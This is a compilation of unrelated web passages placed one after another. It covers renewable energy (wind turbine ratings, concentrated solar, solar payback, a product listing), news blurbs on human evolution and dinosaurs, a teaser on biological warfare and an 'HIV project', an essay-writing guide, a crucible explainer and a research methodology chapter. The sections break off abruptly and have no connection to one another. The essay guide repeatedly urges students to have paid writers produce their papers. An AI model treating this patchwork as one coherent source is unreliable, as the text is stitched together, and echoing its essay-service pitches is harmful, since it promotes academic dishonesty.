The study deals a blow to the “deep reef refugia” hypothesis. That’s the idea that species from troubled shallow reefs could simply move to reefs at depths of 30 to 150 meters, called mesophotic reefs because they exist at the limits of where sunlight reaches. Even though individuals of a typical shallow water species may be spotted at a wide range of depths, it doesn’t mean the majority of that species could survive living in deeper waters, says study coauthor Luiz Rocha, a zoologist at the California Academy of Sciences.
Cyril Richardson and his family witnessed two Category 5 hurricanes in the course of two weeks. They weathered them safely, but like thousands of other Virgin Island residents, they found themselves without power and with no real hope of having it restored for months. With the help of our solar experts, Cyril settled on our popular off-grid system, The Ranch.

At GE, product evolution is at our core, and we are continuously working to develop the next generation of wind energy. Beginning in 2002 with one wind turbine model, we now offer a full suite of turbines created for a variety of wind environments. We offer increased value to customers with proven performance, reliability, and availability. With a portfolio of turbines featuring rated capacities from 1.7 MW to 5.3 MW (Onshore) and 6 MW to 12 MW (Offshore), we are uniquely suited to meet the needs of a broad range of wind regimes.

Concentrator photovoltaics (CPV) systems employ sunlight concentrated onto photovoltaic surfaces for the purpose of electrical power production. Contrary to conventional photovoltaic systems, CPV uses lenses and curved mirrors to focus sunlight onto small but highly efficient multi-junction solar cells. Solar concentrators of all varieties may be used, and these are often mounted on a solar tracker in order to keep the focal point upon the cell as the sun moves across the sky.[147] Luminescent solar concentrators (when combined with a PV solar cell) can also be regarded as a CPV system. Concentrated photovoltaics are useful as they can improve the efficiency of PV solar panels drastically.[148]

The Stirling solar dish combines a parabolic concentrating dish with a Stirling engine which normally drives an electric generator. The advantages of Stirling solar over photovoltaic cells are higher efficiency of converting sunlight into electricity and a longer lifetime.
Parabolic dish systems give the highest efficiency among CSP technologies.[18] The 50 kW Big Dish in Canberra, Australia is an example of this technology.[14]

Other renewable energy technologies are still under development, and include cellulosic ethanol, hot-dry-rock geothermal power, and marine energy.[156] These technologies are not yet widely demonstrated or have limited commercialization. Many are on the horizon and may have potential comparable to other renewable energy technologies, but still depend on attracting sufficient attention and research, development and demonstration (RD&D) funding.[156]
There is more trouble with rated power: It only happens at a “rated wind speed”. And the trouble with that is there is no standard for rated wind speed. Since the energy in the wind increases with the cube of the wind speed, it makes a very large difference if rated power is measured at 10 m/s (22 mph), or 12 m/s (27 mph). For example, that 6 meter wind turbine from the previous section could reasonably be expected to produce 5.2 kW at 10 m/s, while it will do 9 kW at 12 m/s!
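The cube law behind this example can be checked directly. This is a minimal sketch, with `scale_power` as an assumed helper name; the numbers reproduce the paragraph's 5.2 kW at 10 m/s versus roughly 9 kW at 12 m/s.

```python
# Power available in the wind scales with wind speed cubed, so rated power
# quoted at different "rated wind speeds" is not comparable.

def scale_power(power_kw, from_speed_ms, to_speed_ms):
    """Scale a turbine's output by the cube of the wind-speed ratio."""
    return power_kw * (to_speed_ms / from_speed_ms) ** 3

# 5.2 kW rated at 10 m/s, re-rated at 12 m/s:
p = scale_power(5.2, 10.0, 12.0)
print(round(p, 1))  # 9.0 -- about 9 kW, matching the text
```

The same helper shows why a turbine rated at 12 m/s looks almost twice as powerful on paper as the identical machine rated at 10 m/s.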
Responsible development of all of America’s rich energy resources -- including solar, wind, water, geothermal, bioenergy & nuclear -- will help ensure America’s continued leadership in clean energy. Moving forward, the Energy Department will continue to drive strategic investments in the transition to a cleaner, domestic and more secure energy future.

Solar electricity is inherently variable and predictable by time of day, location, and seasons. In addition solar is intermittent due to day/night cycles and unpredictable weather. How much of a special challenge solar power is in any given electric utility varies significantly. In a summer peak utility, solar is well matched to daytime cooling demands. In winter peak utilities, solar displaces other forms of generation, reducing their capacity factors.
What is a small wind turbine? Anything under, say, 10 meters rotor diameter (30 feet) is well within the “small wind” category. That works out to wind turbines with a rated power up to around 20 kW (at 11 m/s, or 25 mph). For larger wind turbines the manufacturers are usually a little more honest, and more money is available to do a good site analysis. The information in this article is generic: The same applies to all the other brands and models, be they of the HAWT (Horizontal Axis Wind Turbine) or VAWT (Vertical Axis Wind Turbine) persuasion.
The time will arrive when the industry of Europe will cease to find those natural resources, so necessary for it. Petroleum springs and coal mines are not inexhaustible but are rapidly diminishing in many places. Will man, then, return to the power of water and wind? Or will he emigrate where the most powerful source of heat sends its rays to all? History will show what will come.[35] Wind turbines need wind. Not just any wind, but the nicely flowing, smooth, laminar kind. That cannot be found at 30 feet height. It can usually not be found at 60 feet. Sometimes you find it at 80 feet. More often than not it takes 100 feet of tower to get there. Those towers cost as much or more, installed, as the turbine itself. How much tower you need for a wind turbine to live up to its potential depends on your particular site; on the trees and structures around it etc. Close to the ground the wind is turbulent, and makes a poor fuel for a small wind turbine.
Our latest innovation in the Industrial Internet era, The Digital Wind Farm, is making our turbines smarter and more connected than ever before. A dynamic, connected and adaptable wind energy ecosystem, the Digital Wind Farm pairs our newest turbines with a digital infrastructure, allowing customers to connect, monitor, predict and optimize unit and site performance.
The market for renewable energy technologies has continued to grow. Climate change concerns and increases in green jobs, coupled with high oil prices, peak oil, oil wars, oil spills, promotion of electric vehicles and renewable electricity, nuclear disasters and increasing government support, are driving increasing renewable energy legislation, incentives and commercialization.[10] New government spending, regulation and policies helped the industry weather the 2009 economic crisis better than many other sectors.[24][197]

The tables above are for HAWTs, the regular horizontal “wind mill” type we are all familiar with. For VAWTs the tables can be used as well, but you have to convert their dimensions. Calculate the frontal area (swept area) of the VAWT by multiplying height and width, or for a curved egg-beater approximate the area. Now convert the surface area to a diameter, as if it were a circle: Diameter = √(4 • Area / Pi). That will give you a diameter for the table. Look up the energy production for that diameter and your average annual wind speed and do the following:

On most horizontal wind turbine farms, a spacing of about 6–10 times the rotor diameter is often upheld. However, for large wind farms distances of about 15 rotor diameters should be more economical, taking into account typical wind turbine and land costs. This conclusion has been reached by research[62] conducted by Charles Meneveau of the Johns Hopkins University,[63] and Johan Meyers of Leuven University in Belgium, based on computer simulations[64] that take into account the detailed interactions among wind turbines (wakes) as well as with the entire turbulent atmospheric boundary layer.

Photovoltaic systems use no fuel, and modules typically last 25 to 40 years. Thus, capital costs make up most of the cost of solar power.
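The VAWT-to-HAWT conversion described above is a one-liner. A minimal sketch (the function name is assumed): compute the frontal area from height times width, then the diameter of a circle with the same area, Diameter = sqrt(4 * Area / Pi).

```python
import math

# Convert a rectangular VAWT frontal (swept) area into the diameter of a
# circle with the same area, so HAWT energy tables can be reused.

def vawt_equivalent_diameter(height_m, width_m):
    """Equivalent HAWT rotor diameter (m) for a rectangular VAWT frontal area."""
    area = height_m * width_m
    return math.sqrt(4.0 * area / math.pi)

# Example: a 3 m tall, 2 m wide VAWT
d = vawt_equivalent_diameter(3.0, 2.0)
print(round(d, 2))  # 2.76
```

So a 3 m x 2 m VAWT intercepts about as much wind as a HAWT with a rotor a little under 2.8 m across.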
Operations and maintenance costs for new utility-scale solar plants in the US are estimated to be 9 percent of the cost of photovoltaic electricity, and 17 percent of the cost of solar thermal electricity.[71] Governments have created various financial incentives to encourage the use of solar power, such as feed-in tariff programs. Also, renewable portfolio standards impose a government mandate that utilities generate or acquire a certain percentage of renewable power regardless of increased energy procurement costs. In most states, RPS goals can be achieved by any combination of solar, wind, biomass, landfill gas, ocean, geothermal, municipal solid waste, hydroelectric, hydrogen, or fuel cell technologies.[72]

In cases of self consumption of the solar energy, the payback time is calculated based on how much electricity is not purchased from the grid. For example, in Germany, with electricity prices of 0.25 €/kWh and insolation of 900 kWh/kW, one kWp will save €225 per year, and with an installation cost of 1700 €/kWp the system cost will be returned in less than seven years.[91] However, in many cases, the patterns of generation and consumption do not coincide, and some or all of the energy is fed back into the grid. The electricity is sold, and at other times when energy is taken from the grid, electricity is bought.
The relative costs and prices obtained affect the economics. In many markets, the price paid for sold PV electricity is significantly lower than the price of bought electricity, which incentivizes self consumption.[92] Moreover, separate self consumption incentives have been used in e.g. Germany and Italy.[92] Grid interaction regulation has also included limitations of grid feed-in in some regions in Germany with high amounts of installed PV capacity.[92][93] By increasing self consumption, the grid feed-in can be limited without curtailment, which wastes electricity.[94]

Features: Human-friendly design, easy to install and maintain. Patented generator, low torque at start-up, high conversion rate. Low start-up speed, high wind power utilization, low vibration and low noise. Automatically adjusts wind direction, high cost-performance. The generator shell uses high-temperature Teflon wire and die-cast aluminum. Blades with built-in copper inserts, so bolts will not damage the nylon fiber.

The Sunforce 44444 400 Watt Wind Generator uses wind to generate power and run your appliances and electronics. Constructed from lightweight, weatherproof cast aluminum, this generator is also a great choice for powering pumps or charging batteries for large power demands. With a maximum power up to 400 watts or 27 amps, this device features a fully integrated regulator that automatically shuts down when the batteries are completely charged. The 44444 is virtually maintenance free with only two moving parts, and the carbon fiber composite blades ensure low wind noise while the patented high wind over-speed technology guarantees a smooth, clean charge. Assembly is required, but this generator installs easily and mounts to any sturdy pole, building, or the Sunforce 44455 Wind Generator 30-Foot Tower Kit.
The 44444 uses a 12-volt battery (not included) and measures 27 x 44 x 44 inches (LxWxH).

A solar cell, or photovoltaic cell (PV), is a device that converts light into electric current using the photovoltaic effect. The first solar cell was constructed by Charles Fritts in the 1880s.[5] The German industrialist Ernst Werner von Siemens was among those who recognized the importance of this discovery.[6] In 1931, the German engineer Bruno Lange developed a photo cell using silver selenide in place of copper oxide,[7] although the prototype selenium cells converted less than 1% of incident light into electricity. Following the work of Russell Ohl in the 1940s, researchers Gerald Pearson, Calvin Fuller and Daryl Chapin created the silicon solar cell in 1954.[8] These early solar cells cost 286 USD/watt and reached efficiencies of 4.5–6%.[9]
An international group of scientists working in Georgia has found fossils showing that several supposed species of early human ancestor in fact belong to a single species, Homo erectus. Anthropologists from Israel, Georgia, the United States and Switzerland reached this conclusion after studying skulls found in a small town in southern Georgia.
In addition to the skull, which is 1.8 million years old, other remains of ancient humans and bones of extinct animals were found. The discoveries have forced scientists to rethink their views on human evolution in Africa.
Continue reading “The generally accepted theory of human evolution”
Paul and Anne Ehrlich, the famous American biologists, believe that we must first give all women equal rights with men. In particular, this means free contraceptives and abortion. All civilizations eventually face crises. The outcomes have differed: some disappeared completely, while others eventually revived. But never before has a catastrophe threatened the whole of mankind.
The famous American biologists Paul and Anne Ehrlich point to two factors that lead to collapse: overpopulation and overconsumption. Both are deceptive. For quite a long time it may seem that the more hands there are and the more active the market, the faster scientific and technological progress moves, and the better we live. But in the end we are left with nothing: natural systems cannot withstand the strain, and the hour of reckoning comes. Continue reading “How to prevent the loss of human evolution?”
About two million years ago, the climate in what is now Olduvai Gorge changed dramatically: droughts alternated with wet periods. The researchers suggest that this may have influenced the evolution of human ancestors.
Scientists examined sediments that formed over a long period in the lakes of Olduvai Gorge. By tracking how the composition of the organic wax that covers the leaves of plants changed in the sediments over time, the scientists concluded that the local ecosystem experienced sharp fluctuations in climate. Continue reading “Human evolution of ancestors associated with abrupt change of climate”
Using forensic techniques, an Australian anthropologist has reconstructed the face of the mysterious Homo floresiensis. Homo floresiensis was discovered on the Indonesian island of Flores in 2003 and caused heated debate.
Some believe it is an entirely new species, while others view it as a representative of an already known species, but with some variations. Susan Hayes has long worked for the police, so attaching muscle and fat to a model of the skull was not difficult for her. She obtained a surprisingly familiar face, with high cheekbones, long ears and a wide nose. Continue reading “Human face evolution”
A dinosaur with a spiked head that roamed Canada 78 million years ago was the oldest horned reptile found in North America.
The herbivore was named Xenoceratops foremostensis, roughly “alien horned face from Foremost” (Foremost being the small town near which the first fossils were found in 1958).
Like its more famous relative Triceratops, which lived 15 million years later, in the last days of the dinosaurs, Xenoceratops had long horns sticking straight out from its forehead and a shield-like frill extending from the skull. Unlike Triceratops, however, Xenoceratops also had horns on its frill. Continue reading “Horned dinosaurs shed light on evolution”
The human species may be heading toward an evolutionary leap. For thousands of years, different cultures around the world have attributed a special role to the sun. It is remarkable how it was revered by civilizations that reached high levels of cultural development in the past, like the Egyptians, who worshipped it as a god (Ra and Aten); the Maya, who deified it under the name Kinich Ahau; and the Inca, who worshipped it as Inti.
All these peoples saw in the sun more than a celestial object. For them it was divinity itself made manifest to men, and for this reason it was an object of worship. One might think that this spiritual identification with a giant fireball was a superstition born of scientific ignorance. Continue reading “Spiritual evolution”
After the Persian Wars, Athens, proud of its beauty and rich from its conquests, shone with extraordinary splendor. This is the period that offers us the most complete picture of Greek life.
The welfare and happiness of the home attracted very little of a Greek's attention. Like most southerners, he spent his days away from home, engaged in business, in exercise, in politics and in ceremonies. He lived not for his family but for the city. Public luxury was his pride; he was personally satisfied with a simple and modest life, provided that the public monuments and the festivals of the gods provoked universal admiration.
Continue reading “Athenian evolution”
The history of biological warfare (BW) can be divided into three parts: ancient history, modern history, and what we might call the present. Ancient history begins far earlier than we might assume a priori and lasts until the end of the twentieth century. To give one example, the first documented use of biological warfare dates back to Roman times, when animal carcasses were used to contaminate enemy water supplies. The idea behind this kind of attack was that a weakened enemy is an enemy easy to defeat. Since then there have been many far-reaching changes. To explain the modern history and the present, and to continue this article, it is interesting to focus our attention on the actions of the United States and their worldwide impact over the last 50 years, especially in politics.
Continue reading “Biological warfare and its evolution: the HIV project”
Geological studies have convincingly shown that during the existence of Australopithecus the Earth's climate became drier and the rain forests retreated. Dangers lurked for Australopithecus in open, treeless areas. They needed to obtain food, including by hunting. The lack of strong claws, teeth and sufficient muscle power led to a unique achievement: the use of stones and sticks as means of protection and as tools.
All this in some way affected their evolution. As finds of skeletal parts have shown, australopithecines are similar to humans in the structure of a number of body parts. They moved on two legs. Over time, they adapted more and more to a changing environment. Thus the anthropoids, fossil apes, united into groups and herds and used the first tools: stones and sticks for defense and for obtaining food. But what kind of food? Continue reading “Human-Path of evolution”
Biologists have published a popular review, “The evidence of evolution”. It examines the main groups of data on the basis of which the global scientific community considers biological evolution a firmly established fact. The publication is a response to intensified creationist propaganda, which forces scientists again and again to justify proven truths. The authors call on believers to be reconciled with science and hope that the review will be a useful tool for those who value knowledge, as opposed to the hypnotic suggestion of creationist propagandists, wrote Elect
Continue reading “Evidence of evolution”
Cause and Effect Essay: How to Write One? Easier Than You Think!
It is usually easy for readers to understand cause-effect relationships. A student who has not done their homework realizes that this may bring some kind of penalty. A cause and effect essay is an academic form of writing that aims at clarifying cause-effect relationships, telling how one event leads to another. Although US students learn to write cause and effect essays in high school and college, the skills they gain serve them well later, whether they pursue higher education or transition to the workplace. Take a look at the content that follows to find out more about cause and effect essays, their organization patterns, and the purposes they serve.
What a Cause and Effect Essay Is and How It Differs from Other Essay Types
Have you ever tried to explain to someone the reasons why you act in one way or another? Or have you discussed the outcome of some event? This is just what a cause and effect essay does. It explores either the reasons why some events or situations occur, or the consequences of things and events that are already in place. Although the name “cause and effect essay” suggests that both causes and effects are analyzed, students often have to choose which factors to focus on most. The choice depends on the topic and your own preferences, unless the task was set by the instructor. If your teacher likes to give students freedom of choice regarding subjects, we have some good cause and effect essay topics you can use right now.
If you compare a cause and effect essay with other essay types, you will easily notice the differences. A specific structure and approach to reasoning distinguish this kind of essay from others. Still, some students confuse the cause and effect essay with the reaction/response essay. The two are similar in the way they present reasoning for a stated viewpoint, but they pursue different goals, and the transitional words and phrases that students use in cause and effect essays usually distinguish them clearly from reaction/response papers.
Strategies for Proper Essay Structure
So, how do you write a cause and effect essay? Like any other paper, your cause and effect essay should have three basic structural elements: introduction, body, and conclusion. The introductory paragraph should attract readers with a hook. You might use an anecdote, a bold opinion, a statistic, or an unusual fact to meet this aim. The introduction should also clearly explain your writing purpose in a well-worded thesis statement. Keep in mind that a good cause and effect thesis statement tells not only what the essay presents but also how it does so.
Each body paragraph needs a topic sentence that introduces the paragraph's content and explains how it relates to the thesis statement. Each paragraph should discuss only one theme, be it a cause or an effect, bringing in evidence relevant to that theme. Body paragraphs should also include transitions clarifying the essay's logic and describing the links between the notions examined.
In the concluding paragraph, you should summarize the essay's specific points and restate your thesis statement using words other than those in the introduction. In the conclusion, you should reassert your viewpoint regarding the discussed sequence of causes and effects. EduBirdie writers know exactly how to make your cause and effect essay truly appealing, so you can ask them for essay help online.
Organization Patterns for Cause and Effect Paper
When it comes to cause and effect essay writing, structure is very important. You will present your viewpoint better with well-thought-out organization. Depending on the essay's focus, its structure varies, and EduBirdie has prepared three major organization patterns you might use to create the best essay. Two of these methods are frequently applied in high school and college writing. The third method is not as widespread, but in some cases you may benefit from using it. When deciding on the structure of your future paper, consider the topic and think about which of two things you want to do: 1) to explore effects, or 2) to examine causes. Depending on your answer, you should choose one of the following options of essay organization:
Effects-Focused Method
An essay that centers on effects analyzes how one or, more often, several effects derive from a particular cause. If you choose this organizational pattern, you will need to describe, in separate paragraphs, several effects of a specific situation or event (your chosen cause).
Causes-Focused Method
If you choose this pattern of organization, you will need to explain how one or, more often, several causes lead to a single effect. This structure implies that each cause will be analyzed in a separate paragraph.
There is one more way of structuring a cause and effect essay. It is not as popular as the two mentioned above, but in some cases it may turn out to be exactly what you need:
Causal Chain Method
Apply this pattern when you need to describe the “domino effect” of how events cause one another. This structure requires you to devote each body paragraph to an event caused by some other event and leading to yet another one. The factors should build a chain, uniting the first and the last event in a logical sequence that describes the cause and effect process. If I had no time to decide which pattern of organization fits my topic well, I would ask EduBirdie for a time-saving solution: I would choose an expert writer who would write the paper for me.
Cause and Effect Essay Outline
Like other essays, a cause and effect paper can stick to the standard five-paragraph structure. You may always add more body paragraphs if your topic is too complex to be discussed in such a limited number of paragraphs. For US high schools and local colleges, this number of paragraphs is usually sufficient, so you can use the sample outlines below when planning your own paper's structure.
The peculiarities of such essay elements as the thesis statement and the cause and effect paragraphs often depend on the essay's focus and your choice of structure. Do you want to learn how the thesis and body paragraphs change depending on the focus? To clarify this point, EduBirdie has prepared two short sample outlines that illustrate the differences. You can either use one of them or ask EduBirdie for a ready-made, detailed cause and effect essay outline that addresses your topic.
Causes-Focused Method
Introduction
Hook: The United States is one of the most obese countries in the world, with over 36% of the population having a body mass index higher than 30.0.
Thesis statement: Many people suffer from obesity in the United States because they watch too many commercials, buy cheap fast food, and play too many video games.
Body paragraph 1.
Watching too many commercials leads to obesity in the United States, because people believe the ads and buy foods that are actually harmful to their health.
A. Commercials affect decision-making.
B. Commercials promote foods that contain too much sugar.
Body paragraph 2.
Cheap fast food consumption is another factor that contributes to obesity.
A. It is easier to get fast food because it is cheap and available.
B. Fast food is harmful because it contains fats that are not good for health.
Body paragraph 3.
Because people play too many video games, their lifestyle becomes sedentary, and they gain even more excess weight.
A. Video games attract many people who are already overweight.
B. Video games consume time, leaving no room for active sports.
Summary
If people in the United States did not buy unhealthy products promoted in commercials, ate less fast food, and spent less time playing video games, they would get rid of the problem of obesity.
Effects-Focused Method
Introduction
Hook: Climate change is a modern plague.
Thesis statement: It leads to sea level rise, contributes to the extinction of species, and adversely affects health.
Body paragraph 1. Climate change accelerates sea level rise.
A. Glaciers shrink
B. Meltwater flows into the ocean and raises the sea level
Body paragraph 2. Species go extinct because of changing climate conditions.
A. Climate change drives a rise in temperature
B. Species go extinct because of an unfavorable climate and droughts
Body paragraph 3. Climate change adversely affects health.
A. Heat waves become longer because of climate change
B. People suffer from droughts and extreme temperatures
Conclusion
Climate change is a major cause of sea level rise and the extinction of species, and it has negative effects on human health.
These outlines are very brief, and you may want to learn more about ways of writing an outline. EduBirdie explains how to write an outline for a research paper in great detail, and you can easily adapt those recommendations to your cause and effect essay outline.
Examples with Explanations
If you are looking for cause and effect essay examples for college, EduBirdie has some for you. Go ahead and check how the basic organization patterns can help develop strong cause and effect essays.
Causes-Focused Method
The United States is one of the most obese countries in the world, with about 36% of the population having a body mass index higher than 30.0. Mainly, this situation is caused by the choices people make in their everyday lives. Many suffer from obesity in the United States because they watch too many commercials, buy cheap fast food, and play too many video games.
Watching too many commercials contributes to obesity in the United States because viewers believe the ads and buy foods that are actually bad for their health. Commercials affect decision-making. Many consumers decide to buy products just because they saw them on TV, without considering the effects these products have on health. Given that commercials promote foods that contain too much sugar, people tend to buy unhealthy food when they blindly listen to commercials. Unfortunately, modern advertisements are so convincing that it is difficult to ignore them, which aggravates the problem of obesity.
Cheap fast food consumption is another factor that contributes to obesity. It is easier to get fast food because it is available and cheap. People can buy it almost everywhere. However, fast food causes obesity because it contains fats that are not good for health. The more people prioritize fast food over a proper diet, the more overweight they become, especially if their lifestyles are not active enough.
Because people play too many video games, their lifestyle becomes sedentary, and they gain even more excess weight. Video games attract many people who already have excess weight. It is easier to watch an avatar on a screen than to take part in sports. Ultimately, video games consume time, leaving no room for active sports, and this makes people more overweight. Lack of physical activity only adds to weight-related problems.
If people in the United States did not buy unhealthy products promoted in commercials, ate less fast food, and spent less time playing video games, they would get rid of the problem of obesity.
Effects-Focused Method
Climate change is a modern plague. It has many adverse effects, some of which are especially troubling. Climate change leads to sea level rise, contributes to the extinction of species, and adversely affects health.
Climate change accelerates sea level rise. It makes glaciers shrink at an unprecedented pace. As more ice melts, meltwater flows into the ocean and raises the sea level. The rise in sea level represents a hazard to the inhabitants, both people and animals, of coastal areas.
Species go extinct because of changing climate conditions. Climate change causes a rise in temperature. Species become extinct as a result of an unfavorable climate and droughts. Even those with greater means of adapting to changing conditions have reason to suffer.
Climate change adversely affects health. Heat waves become longer because of climate change. As a result, people suffer from droughts and extreme temperatures.
Climate change is a major cause of sea level rise, the extinction of species, and negative effects on human health. It is important to address the causes of climate change in order to eliminate its negative effects.
A Final Word of Guidance
We defined what a cause and effect essay is, explained its purpose, and analyzed its structure. We also considered several approaches to organizing the reasoning in cause and effect essays. Together, we examined examples that illustrate each approach. If all this information seems too complex to grasp at once, you can choose another option, as EduBirdie's professional writers write papers online.
If you are too constrained in time because of a busy curriculum, EduBirdie's writers are ready to help you. EduBirdie is a special platform. Unlike other companies, it has a bidding system and lets you choose the writer you like on your own. You can also pick the most acceptable price for you among the many bids you will get after placing an order. So get your original cause and effect essay and try all the benefits of EduBirdie.
Nature is the framework of values and principles from which all life and products of the universe are created. It is neither a destination nor a place to go but rather a mindset that ignites personal spiritual growth. Nature is a wise and profound teacher from which individuals can derive their unique perspective of the world around them. These values set the direction on how citizens of this world should walk into the future. This is not about measuring or quantifying Nature or life but creating a framework for human growth and establishing a set of values that we prioritize culturally and individually:
Humbleness, not Righteousness; Better, not Easier; Respect, not Protect; Consciousness, not Senselessness; Reciprocity, not Opportunism; Community, not Individuality; Slower, not Faster; Local, not Global; Accountability, not Dishonesty; Long-Term, not Short-Term; Forward, not Backward; Optimism, not Pessimism; Dynamic, not Static; Evolution, not Perfection; Resilient, not Intransigent.
In medium frequency induction furnace smelting, the crucible plays a surprisingly large role.
The medium frequency induction furnace contains a crucible, which is an important component of the furnace and the basis for induction energy conversion and metal smelting. It plays an important role in the smelting process. Its functions are explained in detail below.
(1) The crucible is an important medium for the effective transmission of energy from the induction coil to the molten steel; that is, it allows electromagnetic energy to be converted into thermal energy, providing the basic conditions for metal smelting.
(2) The crucible provides electrical insulation between the induction coil and the molten steel.
(3) The crucible withstands various stresses, such as the gravity, thermal stress and electromagnetic force of the charge or molten steel.
(4) The crucible's heat-insulating effect reduces heat loss and maintains the temperature needed for smelting processes such as melting and refining molten steel, so that smelting can proceed smoothly.
(5) The crucible withstands the chemical attack of high-temperature molten steel and high-temperature slag. By maintaining good stability, it provides a stable space for smelting.
We also need to pay attention to its accessories when choosing an electric furnace. Attention to every detail can make the equipment last longer.
Chapter III
Methodology and Procedure

Research Design
This research on the Effects of the Integration of Audio and Visual Technology on the Learning Outcomes in the Reading and Writing course of Grade 11 Science, Technology, Engineering and Mathematics (STEM) students of the Technological Institute of the Philippines, Quezon City, will utilize a mixed-method research design. This design involves integrating quantitative and qualitative ways of gathering and analyzing data. It allows a deeper and better understanding of the study, with both the quantitative and the qualitative data answering the research problems. Through this method the researchers can see different perspectives of the study rather than relying on only one of the two methods; they can also validate their data because the two methods are merged.
This research will use a sequential explanatory design, which involves the collection and analysis of quantitative data first, followed by the collection and analysis of qualitative data. This method allows the researchers to examine, analyze, interpret, and contextualize the quantitative findings with the help of the qualitative data gathered. It also gives the researchers an opportunity to validate and expand on the data collected, and to strengthen their claims by supporting the quantitative data with qualitative data. In case of discrepancy, this method allows the researchers to examine unexpected quantitative results in more detail.

Variables in Quantitative Analysis
The first phase of the study involves independent and dependent variables that will be measured and analyzed using statistical treatments in order to answer the research questions.
This study seeks to investigate the impact of the integration of audio-visual technology on learning outcomes in classrooms, the learning outcomes being the dependent variable and the integration of audio-visual technology the independent variable. The study also treats the students' learning styles as an extraneous variable. The students' learning outcomes will be measured through assessments given by their instructor, and these will depend on whether the instructor used audio-visual aids during the discussion or not. Inevitably, the students' learning styles will affect how they learn, so they are considered an extraneous variable.

Variables in Qualitative Analysis
The second phase likewise involves independent and dependent variables, which will be collected through open-ended questions. This phase aims to collect feedback from the respondents regarding their experiences during classroom discussions. The students' experiences serve as the independent variable, while their feedback serves as the dependent variable. The students' learning styles will still affect their opinions about the use of audio-visual aids, so they are again considered an extraneous variable.

Target Population and Sampling Procedure
The intended population for this study is the population of Grade 11 STEM students of the Technological Institute of the Philippines. There are 16 sections in the STEM strand, each with approximately 60 students. Since the study is about the effects of using audio-visual technology in the classroom, it involves two randomly selected sections that will serve as the controlled and experimental groups.
The researchers chose to select classrooms using simple random sampling so that every member of the intended population gets an equal chance of participating in the study.

Phase I: Quantitative

Data Collection
The first phase of the data collection will focus on determining how the integration of audio-visual technology affects learning outcomes in the classrooms of Grade 11 STEM students of the Technological Institute of the Philippines, Quezon City. This phase will utilize a pre-test/post-test design to gather data measuring, in quantitative terms, how the students perform with and without the use of audio-visual technology. Two randomly selected Grade 11 STEM classrooms will participate in this phase, one being the controlled group and the other the experimental group. The two classrooms will study the same lessons under the same instructor and take the same assessments from that instructor. Before the actual data collection starts, a preliminary survey consisting of a single question about their preferred learning style will be conducted among the members of the sample. After the preliminary survey, both classrooms will study the first lesson without the use of audio-visual aids and then take an assessment measuring their learning outcomes. The second lesson is where the treatment takes place: the experimental group will use audio-visual aids during their discussions, while the controlled group will still practice the traditional marker-and-board method. Another assessment will then be conducted to measure the impact of the treatment on the experimental group.
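The simple random sampling step described above can be sketched in a few lines of Python; the section labels and the fixed seed below are hypothetical, used only for illustration:

```python
import random

# Hypothetical roster: 16 STEM sections, labeled "STEM-1" .. "STEM-16".
sections = [f"STEM-{i}" for i in range(1, 17)]

random.seed(42)  # fixed seed so the draw can be reproduced and audited
# random.sample draws without replacement, so every section has an
# equal chance of selection and the two groups are guaranteed distinct.
controlled, experimental = random.sample(sections, k=2)

print("controlled group:   ", controlled)
print("experimental group: ", experimental)
```

Drawing both groups in a single `sample` call (rather than two separate draws) is what guarantees the controlled and experimental sections are different.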
The average marks of the students in the assessments from both groups will be compared to determine whether there is a statistically significant difference between the learning outcomes of the controlled and experimental groups.

Data Analysis
The results of the pre- and post-assessments will be analyzed using the statistical treatment called the z-test. A z-test is a statistical test used to determine whether two population means are different when the variances are known and the sample size is large. The test statistic is assumed to have a normal distribution, and nuisance parameters such as the standard deviation should be known for an accurate z-test to be performed (Silver C., 2018). Since the study involves two groups, the sample size is large enough, and the variances of the scores can be easily determined, this statistical analysis is appropriate for the study.

Reliability and Validity
Validity and reliability are often interchangeable terms in everyday use, but in statistics and research the two terms mean different things. Validity is when the questions answer what they are supposed to answer, while reliability is when the data collected are consistent across multiple tests. The researchers address threats to the validity and reliability of the study by making sure that the goals and objectives are clearly defined and operationalized, by aligning the instruments used with the goals and objectives, and by having experts in the field, such as school faculty, review the instruments for corrections and feedback.

Phase II: Qualitative

Data Collection
The second phase of the data collection will focus on the students' feedback about the use of audio-visual aids during classroom discussions, particularly in relation to their preferred learning styles.
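The two-sample z-test described above can be sketched as follows. The score means, variances, and group sizes in the example call are hypothetical placeholders, not actual study data:

```python
import math

def two_sample_z_test(mean1, mean2, var1, var2, n1, n2):
    """Two-sample z-test for a difference in population means,
    assuming known variances and large samples."""
    se = math.sqrt(var1 / n1 + var2 / n2)   # standard error of the difference
    z = (mean1 - mean2) / se
    # Two-tailed p-value under the standard normal distribution.
    p = math.erfc(abs(z) / math.sqrt(2))
    return z, p

# Hypothetical assessment scores: experimental vs. controlled group,
# 60 students each (one section per group).
z, p = two_sample_z_test(mean1=82.0, mean2=76.5,
                         var1=64.0, var2=81.0,
                         n1=60, n2=60)
print(f"z = {z:.2f}, p = {p:.4f}")  # reject H0 at alpha = 0.05 if p < 0.05
```

With groups of about 60 students, the large-sample assumption behind the z-test is reasonable; for smaller groups a t-test would be the more usual choice.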
This phase will utilize a survey composed of open-ended questions about the learning styles or preferences of the students and their experiences and opinions regarding the audio-visual technology. According to Walter Burke Barbe and colleagues, there are seven different learning styles through which a person perceives and analyzes information: visual or spatial (prefers pictures, images, and spatial understanding), aural or auditory-musical (prefers sound and music), verbal or linguistic (prefers words, both in speech and writing), physical or kinesthetic (prefers using the body, hands, and sense of touch), logical or mathematical (prefers logic, reasoning, and systems), social or interpersonal (prefers to learn in groups or with other people), and solitary or intrapersonal (prefers to work alone and use self-study). The different learning styles among the students will result in different responses to a particular teaching style (with or without audio-visual aids), and this phase seeks to gather and analyze those data in qualitative terms.

Data Analysis

In the second phase of the study, the data obtained through interviews or open-ended questions will be coded and analyzed so that they can be interpreted. This can be done through the following steps: (1) conducting a preliminary exploration of the data by reading the responses, (2) segmenting and labeling the text according to its central theme, (3) grouping responses with similar codes and themes together, (4) interrelating the different codes and themes, and (5) constructing an overall interpretation of the responses. This interpretation will then be used to amplify or support the findings of the first phase.

Establishing Credibility

Establishing credibility is crucial for a research study because it is the basis of the legitimacy of the process and findings of the study from the perspective of participants and readers alike.
The criteria for the validity and reliability of quantitative research and the credibility of qualitative research differ from one another. The two most common methods of establishing the credibility of research are triangulation and member checking. Triangulation involves using multiple methods, data sources, observers, or theories in order to gain a more complete understanding of the phenomenon being studied. It is used to make sure that the research findings are robust, rich, comprehensive, and well-developed. There are four types of triangulation that researchers can employ (Statistics Solutions, 2017). The member-checking method, on the other hand, is a technique in which the data, interpretations, and conclusions are shared with the participants.
